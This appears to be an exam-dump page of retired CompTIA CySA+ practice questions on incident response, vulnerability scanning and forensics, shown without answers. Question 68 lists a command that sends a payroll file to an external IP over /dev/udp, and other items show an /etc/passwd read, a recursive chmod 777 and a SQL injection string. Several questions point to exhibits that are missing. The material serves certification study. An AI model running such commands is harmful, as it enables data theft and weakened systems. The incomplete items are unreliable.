Weekend Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

CS0-001 Questions and Answers

Note! Following CS0-001 Exam is Retired now. Please select the alternative replacement for your Exam Certification. The new exam code is CS0-002

CS0-001 Questions and Answers

Question # 6

A security incident has been created after noticing unusual behavior from a Windows domain controller. The server administrator has discovered that a user logged in to the server with elevated permissions, but the user’s account does not follow the standard corporate naming scheme. There are also several other accounts in the administrators group that do not follow this naming scheme. Which of the following is the possible cause for this behavior and the BEST remediation step?

A.

The Windows Active Directory domain controller has not completed synchronization, and should force the domain controller to sync.

B.

The server has been compromised and should be removed from the network and cleaned before reintroducing it to the network.

C.

The server administrator created user accounts cloning the wrong user ID, and the accounts should be removed from administrators and placed in an employee group.

D.

The naming scheme allows for too many variations, and the account naming convention should be updates to enforce organizational policies.

Full Access
Question # 7

When performing reverse engineering, which of the following file types would be MOST easily decompiled Into source code?

A.

so

B.

.exe

C.

.Jar

D.

a

Full Access
Question # 8

A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless internet access from BYOD approved systems tablets and smartphones. The users can also access corporate resources from an internal-facing web portal now ever all of these services require a separate set of credentials. Which of the following should the cybersecurity analyst recommend to aggregate and audit on logins while allowing the corporate directory services credentials to be shared across all of the services?

A.

SAML

B.

Kerberos

C.

SSO

D.

RADIUS

Full Access
Question # 9

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

A.

Security regression testing

B.

User acceptance testing

C.

Input validation testing

D.

Static code testing

Full Access
Question # 10

After analyzing and correlating activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed. This is an example of:

A.

privilege escalation.

B.

advanced persistent threat.

C.

malicious insider threat.

D.

spear phishing.

Full Access
Question # 11

As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Select two.)

A.

Timing of the scan

B.

Contents of the executive summary report

C.

Excluded hosts

D.

Maintenance windows

E.

IPS configuration

F.

Incident response policies

Full Access
Question # 12

Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Select TWO).

A.

To schedule personnel resources required for test activities

B.

To determine frequency of team communication and reporting

C.

To mitigate unintended impacts to operations

D.

To avoid conflicts with real intrusions that may occur

E.

To ensure tests have measurable impact to operations

Full Access
Question # 13

A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

A.

The security analyst should recommend this device be placed behind a WAF.

B.

The security analyst should recommend an IDS be placed on the network segment.

C.

The security analyst should recommend this device regularly export the web logs to a SIEM system.

D.

The security analyst should recommend this device be included in regular vulnerability scans.

Full Access
Question # 14

A security professional is analyzing the results of a network utilization report. The report includes the following information:

Which of the following servers needs further investigation?

A.

hr.dbprod.01

B.

R&D.file.srvr.01

C.

mrktg.file.srvr.02

D.

web.srvr.03

Full Access
Question # 15

A security analyst has just completed a vulnerability scan of servers that support a business critical application that is managed by an outside vendor. The results of the scan indicate the devices are missing critical patches. Which of the following factors can inhibit remediation of these vulnerabilities? (Choose two.)

A.

Inappropriate data classifications

B.

SLAs with the supporting vendor

C.

Business process interruption

D.

Required sandbox testing

E.

Incomplete asset inventory

Full Access
Question # 16

A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process prior to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Choose two.)

A.

Breach of confidentiality and market risks can occur if the potential acquisition is leaked to the press.

B.

The parent company is only going through this process to identify and steal the intellectual property of the smaller company.

C.

Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.

D.

Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.

E.

The industry regulator may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place.

F.

The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

Full Access
Question # 17

Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment?

A.

Place the malware on an isolated virtual server disconnected from the network.

B.

Place the malware in a virtual server that is running Windows and is connected to the network.

C.

Place the malware on a virtual server connected to a VLAN.

D.

Place the malware on a virtual server running SIFT and begin analysis.

Full Access
Question # 18

A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator is able to ping every device on the network and confirms that the network is very slow.

Output:

Given the above results, which of the following should the administrator investigate FIRST?

A.

The AP-Workshop device

B.

The AP-Reception device

C.

The device at 192.168.1.4

D.

The AP-IT device

E.

The user’s PC

Full Access
Question # 19

A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

A.

Advanced persistent threat

B.

Zero day

C.

Trojan

D.

Logic bomb

Full Access
Question # 20

Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A.

Antivirus

B.

HIPS

C.

Firewall

D.

Proxy

Full Access
Question # 21

A project lead is reviewing the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The statement of work specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indication weaknesses in the infrastructure.

The scope of activity as described in the statement of work is an example of:

A.

session hijacking

B.

vulnerability scanning

C.

social engineering

D.

penetration testing

E.

friendly DoS

Full Access
Question # 22

After completing a vulnerability scan, the following output was noted:

Which of the following vulnerabilities has been identified?

A.

PKI transfer vulnerability.

B.

Active Directory encryption vulnerability.

C.

Web application cryptography vulnerability.

D.

VPN tunnel vulnerability.

Full Access
Question # 23

A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered?

A.

DDoS

B.

APT

C.

Ransomware

D.

Software vulnerability

Full Access
Question # 24

An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

A.

Reports show the scanner compliance plug-in is out-of-date.

B.

Any items labeled ‘low’ are considered informational only.

C.

The scan result version is different from the automated asset inventory.

D.

‘HTTPS’ entries indicate the web page is encrypted securely.

Full Access
Question # 25

Law enforcement has contacted a corporation’s legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach?

A.

Perform security awareness training about incident communication.

B.

Request all employees verbally commit to an NDA about the breach.

C.

Temporarily disable employee access to social media.

D.

Have law enforcement meet with employees.

Full Access
Question # 26

A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform?

A.

Continue monitoring critical systems.

B.

Shut down all server interfaces.

C.

Inform management of the incident.

D.

Inform users regarding the affected systems.

Full Access
Question # 27

A cybersecurity analyst is conducting a security test to ensure that information regarding the web server is protected from disclosure. The cybersecurity analyst requested an HTML file from the web server, and the response came back as follows:

Which of the following actions should be taken to remediate this security issue?

A.

Set “Allowlatescanning” to 1 in the URLScan.ini configuration file.

B.

Set “Removeserverheader” to 1 in the URLScan.ini configuration file.

C.

Set “Enablelogging” to 0 in the URLScan.ini configuration file.

D.

Set “Perprocesslogging” to 1 in the URLScan.ini configuration file.

Full Access
Question # 28

A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform?

A.

Use the IP addresses to search through the event logs.

B.

Analyze the trends of the events while manually reviewing to see if any of the indicators match.

C.

Create an advanced query that includes all of the indicators, and review any of the matches.

D.

Scan for vulnerabilities with exploits known to have been used by an APT.

Full Access
Question # 29

Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Select two.)

A.

COBIT

B.

NIST

C.

ISO 27000 series

D.

ITIL

E.

OWASP

Full Access
Question # 30

When network administrators observe an increased amount of web traffic without an increased number of financial transactions, the company is MOST likely experiencing which of the following attacks?

A.

Bluejacking

B.

ARP cache poisoning

C.

Phishing

D.

DoS

Full Access
Question # 31

A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as “root” and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Select TWO).

A.

Log aggregation and analysis

B.

Software assurance

C.

Encryption

D.

Acceptable use policies

E.

Password complexity

F.

Network isolation and separation

Full Access
Question # 32

File integrity monitoring states the following files have been changed without a written request or approved change. The following change has been made:

chmod 777 –Rv /usr

Which of the following may be occurring?

A.

The ownership pf /usr has been changed to the current user.

B.

Administrative functions have been locked from users.

C.

Administrative commands have been made world readable/writable.

D.

The ownership of/usr has been changed to the root user.

Full Access
Question # 33

A cybersecurity analyst has received an alert that well-known “call home” messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause?

A.

Attackers are running reconnaissance on company resources.

B.

An outside command and control system is attempting to reach an infected system.

C.

An insider is trying to exfiltrate information to a remote network.

D.

Malware is running on a company system.

Full Access
Question # 34

After scanning the main company’s website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning:

The analyst reviews a snippet of the offending code:

Which of the following is the BEST course of action based on the above warning and code snippet?

A.

The analyst should implement a scanner exception for the false positive.

B.

The system administrator should disable SSL and implement TLS.

C.

The developer should review the code and implement a code fix.

D.

The organization should update the browser GPO to resolve the issue.

Full Access
Question # 35

A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application.

The security administrator notices that the new application uses a port typically monopolized by a virus.

The security administrator denies the request and suggests a new port or service be used to complete the application’s task.

Which of the following is the security administrator practicing in this example?

A.

Explicit deny

B.

Port security

C.

Access control lists

D.

Implicit deny

Full Access
Question # 36

Which of the following commands would a security analyst use to make a copy of an image for forensics use?

A.

dd

B.

wget

C.

touch

D.

rm

Full Access
Question # 37

In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed?

A.

Attempt to identify all false positives and exceptions, and then resolve all remaining items.

B.

Hold off on additional scanning until the current list of vulnerabilities have been resolved.

C.

Place assets that handle PHI in a sandbox environment, and then resolve all vulnerabilities.

D.

Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.

Full Access
Question # 38

Which of the following principles describes how a security analyst should communicate during an incident?

A.

The communication should be limited to trusted parties only.

B.

The communication should be limited to security staff only.

C.

The communication should come from law enforcement.

D.

The communication should be limited to management only.

Full Access
Question # 39

Following a data compromise, a cybersecurity analyst noticed the following executed query:

SELECT * from Users WHERE name = rick OR 1=1

Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack? (Select TWO).

A.

Cookie encryption

B.

XSS attack

C.

Parameter validation

D.

Character blacklist

E.

Malicious code execution

F.

SQL injection

Full Access
Question # 40

A retail corporation with widely distributed store locations and IP space must meet PCI requirements relating to vulnerability scanning. The organization plans to outsource this function to a third party to reduce costs.

Which of the following should be used to communicate expectations related to the execution of scans?

A.

Vulnerability assessment report

B.

Lessons learned documentation

C.

SLA

D.

MOU

Full Access
Question # 41

A business-critical application is unable to support the requirements in the current password policy because it does not allow the use of special characters. Management does not want to accept the risk of a possible security incident due to weak password standards. Which of the following is an appropriate means to limit the risks related to the application?

A.

A compensating control

B.

Altering the password policy

C.

Creating new account management procedures

D.

Encrypting authentication traffic

Full Access
Question # 42

An organization is experiencing degradation of critical services and availability of critical external resources. Which of the following can be used to investigate the issue?

A.

Netflow analysis

B.

Behavioral analysis

C.

Vulnerability analysis

D.

Risk analysis

Full Access
Question # 43

An analyst is troubleshooting a PC that is experiencing high processor and memory consumption. Investigation reveals the following processes are running on the system:

  • lsass.exe
  • csrss.exe
  • wordpad.exe
  • notepad.exe

Which of the following tools should the analyst utilize to determine the rogue process?

A.

Ping 127.0.0.1.

B.

Use grep to search.

C.

Use Netstat.

D.

Use Nessus.

Full Access
Question # 44

A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot afford to purchase a data loss prevention (DLP) system. Which of the following recommendations should the security analyst make to provide defense-in-depth against data loss? (Select THREE).

A.

Prevent users from accessing personal email and file-sharing sites via web proxy

B.

Prevent flash drives from connecting to USB ports using Group Policy

C.

Prevent users from copying data from workstation to workstation

D.

Prevent users from using roaming profiles when changing workstations

E.

Prevent Internet access on laptops unless connected to the network in the office or via VPN

F.

Prevent users from being able to use the copy and paste functions

Full Access
Question # 45

A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring?

A.

Someone has logged on to the sinkhole and is using the device.

B.

The sinkhole has begun blocking suspect or malicious traffic.

C.

The sinkhole has begun rerouting unauthorized traffic.

D.

Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.

Full Access
Question # 46

A threat intelligence analyst who works for a financial services firm received this report:

“There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called “LockMaster” by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector.”

The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Select TWO).

A.

Advise the firewall engineer to implement a block on the domain

B.

Visit the domain and begin a threat assessment

C.

Produce a threat intelligence message to be disseminated to the company

D.

Advise the security architects to enable full-disk encryption to protect the MBR

E.

Advise the security analysts to add an alert in the SIEM on the string “LockMaster”

F.

Format the MBR as a precaution

Full Access
Question # 47

A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.)

A.

Tamper-proof seals

B.

Faraday cage

C.

Chain of custody form

D.

Drive eraser

E.

Write blockers

F.

Network tap

G.

Multimeter

Full Access
Question # 48

A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat.

Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.)

A.

Cardholder data

B.

Intellectual property

C.

Personal health information

D.

Employee records

E.

Corporate financial data

Full Access
Question # 49

A cybersecurity professional wants to determine if a web server is running on a remote host with the IP address 192.168.1.100. Which of the following can be used to perform this task?

A.

nc 192.168.1.100 -1 80

B.

ps aux 192.168.1.100

C.

nmap 192.168.1.100 –p 80 –A

D.

dig www 192.168.1.100

E.

ping –p 80 192.168.1.100

Full Access
Question # 50

Considering confidentiality and integrity, which of the following make servers more secure than desktops? (Select THREE).

A.

VLANs

B.

OS

C.

Trained operators

D.

Physical access restriction

E.

Processing power

F.

Hard drive capacity

Full Access
Question # 51

A cybersecurity analyst was asked to discover the hardware address of 30 networked assets. From a command line, which of the following tools would be used to provide ARP scanning and reflects the MOST efficient method for accomplishing the task?

A.

nmap

B.

tracert

C.

ping –a

D.

nslookup

Full Access
Question # 52

The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that:

A.

change and configuration management processes do not address SCADA systems.

B.

doing so has a greater chance of causing operational impact in SCADA systems.

C.

SCADA systems cannot be rebooted to have changes to take effect.

D.

patch installation on SCADA systems cannot be verified.

Full Access
Question # 53

The security configuration management policy states that all patches must undergo testing procedures before being moved into production. The security analyst notices a single web application server has been downloading and applying patches during non-business hours without testing. There are no apparent adverse reactions, server functionality does not seem to be affected, and no malware was found after a scan.

Which of the following actions should the analyst take?

A.

Reschedule the automated patching to occur during business hours.

B.

Monitor the web application service for abnormal bandwidth consumption.

C.

Create an incident ticket for anomalous activity.

D.

Monitor the web application for service interruptions caused from the patching.

Full Access
Question # 54

A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data?

A.

Quarterly

B.

Yearly

C.

Bi-annually

D.

Monthly

Full Access
Question # 55

During a web application vulnerability scan, it was discovered that the application would display inappropriate data after certain key phrases were entered into a webform connected to a SQL database server. Which of the following should be used to reduce the likelihood of this type of attack returning sensitive data?

A.

Static code analysis

B.

Peer review code

C.

Input validation

D.

Application fuzzing

Full Access
Question # 56

Which of the following has the GREATEST impact to the data retention policies of an organization?

A.

The CIA classification matrix assigned to each piece of data

B.

The level of sensitivity of the data established by the data owner

C.

The regulatory requirements concerning the data set

D.

The technical constraints of the technology used to store the data

Full Access
Question # 57

A cybersecurity analyst is reviewing log data and sees the output below:

Which of the following technologies MOST likely generated this log?

A.

Stateful inspection firewall

B.

Network-based intrusion detection system

C.

Web application firewall

D.

Host-based intrusion detection system

Full Access
Question # 58

An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scans be performed, and the security team should remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scans, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices?

A.

CVSS

B.

SLA

C.

ITIL

D.

OpenVAS

E.

Qualys

Full Access
Question # 59

A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.

Which of the following BEST describes the control being implemented?

A.

Audit remediation

B.

Defense in depth

C.

Access control

D.

Multifactor authentication

Full Access
Question # 60

A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility?

A.

Run a penetration test on the installed agent.

B.

Require that the solution provider make the agent source code available for analysis.

C.

Require through guides for administrator and users.

D.

Install the agent for a week on a test system and monitor the activities.

Full Access
Question # 61

A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week:

Based on the above information, which of the following should the system administrator do? (Select TWO).

A.

Verify the vulnerability using penetration testing tools or proof-of-concept exploits.

B.

Review the references to determine if the vulnerability can be remotely exploited.

C.

Mark the result as a false positive so it will show in subsequent scans.

D.

Configure a network-based ACL at the perimeter firewall to protect the MS SQL port.

E.

Implement the proposed solution by installing Microsoft patch Q316333.

Full Access
Question # 62

Which of the following is a vulnerability that is specific to hypervisors?

A.

DDoS

B.

VLAN hopping

C.

Weak encryption

D.

WMescape

Full Access
Question # 63

A security analyst Is reviewing the most recent company scan results. Multiple Linux systems do not return any results. A comparison of the previous report, however, shows these same systems had several open vulnerabilities. Which of the following steps should the security analyst take NEXT?

A.

Submit the results to operations for validation of remediation.

B.

Ensure the systems are available to the scanner.

C.

Submit the remediation report to management to illustrate progress.

D.

Ensure kernel access Is granted to the scanner for authentication.

Full Access
Question # 64

A systems administrator at a company notices an unknown, randomly named process running on a database server that contains several terabytes of personal and account data for customers Reviewing the server, the administrator notices the process was installed and began running two days ago Database logs stored off the server Indicate unusual queries were run but not against tables containing personal and account data. Network logs show encrypted network traffic at minimal levels lo an external IP address that began shortly after the process started and ended at midnight yesterday wnen the threat intelligence feed automatically blocked the IP address. Which of the following is the BEST course of action'

A.

Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.

B.

Contact all customers with records in the database to let them know their information may have been compromised.

C.

Kill the process, delete It from the server to prevent It from spreading, and restore a backup of the server.

D.

Leave the process running and remove the network block, allowing the administrator to study the process and determine its purpose.

Full Access
Question # 65

A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

A.

Access control policy

B.

Account management policy

C.

Password policy

D.

Data ownership policy

Full Access
Question # 66

An analyst is reviewing the following log from the company web server:

Which of the following is this an example of?

A.

Online rainbow table attack

B.

Offline brute force attack

C.

Offline dictionary attack

D.

Online hybrid attack

Full Access
Question # 67

A security analyst received an email with the following key:

Xj3XJ3LLc

A second security analyst received an email with following key:

3XJ3xjcLLC

The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example of:

A.

dual control

B.

private key encryption

C.

separation of duties

D.

public key encryption

E.

two-factor authentication

Full Access
Question # 68

A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A.

nmap –A –sV 192.168.1.235

B.

cat payroll.csv > /dev/udp/123.456.123.456/53

C.

cat/etc/passwd

D.

mysql –h 192.168.1.235 –u test -p

Full Access